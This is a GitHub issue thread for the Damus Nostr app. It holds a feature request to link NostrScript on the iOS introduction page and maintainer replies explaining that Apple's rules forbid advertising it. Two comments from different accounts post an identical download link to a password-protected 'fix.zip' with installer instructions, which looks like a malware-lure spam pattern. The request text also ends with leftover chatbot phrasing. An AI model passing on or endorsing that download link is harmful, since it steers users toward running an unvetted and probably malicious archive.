### ISSUE TITLE
Add NostrScript Link to Damus Introduction Page

### ISSUE THREAD

**Issue by sootisooti** [damus-io/damus#2392]
# Feature Request: Add NostrScript Link to Damus Introduction Page

## Is your feature request related to a problem? Please describe.
Yes, currently iOS users of the Damus app may find it difficult to perform zaps (sending money to show appreciation) due to complex procedures or lack of appropriate tools. The inability to zap conveniently may reduce engagement and support between users in the Nostr network.

## When does this problem occur?
This problem occurs from the moment iOS users start using Damus and want to zap but find no convenient or clear way to do so. It's especially problematic for new users who may not be familiar with the necessary steps.

## Describe the solution you'd like
I propose adding a link to NostrScript (https://nostrscript.suhailsaqan.com) on the introduction page of the Damus app on iOS. Here are the details:

1. Add a clearly visible button or link on the Damus introduction page that says "Set up Zaps with NostrScript".
2. When this link is clicked, open a web browser to https://nostrscript.suhailsaqan.com.
3. Add a brief explanation of what NostrScript is and why it's useful for zapping.
4. Possibly include a short step-by-step guide on how to use NostrScript to set up zaps.

## Describe alternatives you've considered
1. Create a built-in zap feature for Damus on iOS, but this might require more time and resources to develop.
2. Let users search for ways to set up zaps on their own, but this might cause many users to miss out on using this feature.
3. Add the NostrScript link in other parts of the app, but placing it on the introduction page would make it easiest for new users to find.

## Additional context
Adding this NostrScript link will help iOS users access and set up zapping more easily, which will promote engagement in the Nostr community and support the use of this important feature. Additionally, it introduces users to a useful tool right from the start of using the app.

I've translated the feature request for adding the NostrScript link to the Damus introduction page into English. You can use this content as a starting point and adjust it according to your needs.

Is there anything you'd like me to modify or add to this feature request? Or if you're satisfied with this content, you can use it as is.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alltheseas** [comment]
Thanks for the suggestion @sootisooti. 

Appstore hinders zaps. Damus notedeck github.com/damus-io/notedeck will make zaps great again

**Comment by jb55** [comment]
these scripts are technically not allowed by apple, we can't really advertise them without risking a ban of our app
